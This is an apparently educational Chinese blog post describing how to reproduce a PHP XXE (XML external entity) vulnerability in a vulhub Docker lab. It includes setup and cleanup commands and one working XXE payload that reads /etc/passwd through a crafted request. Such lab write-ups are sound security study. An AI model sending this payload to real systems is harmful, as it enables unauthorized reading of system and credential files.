学习PHPXXE漏洞

信息安全不简单鸭 2024-08-04 20:36:33

这个实验比较简单,就复现一个XXE漏洞,读取passwd文件,其中执行系统命令、内网探测不好复现。XXE(XML External Entity,XML 外部实体注入)当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

docker-compose downdocker system prune -a -f //可选

简单访问一下,说明PHP XXE漏洞环境搭建成功了

掏出burpsuite,构造GET请求,读取本地文件

<?xml version = "1.0"?><!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>

0 阅读:0

信息安全不简单鸭

简介:感谢大家的关注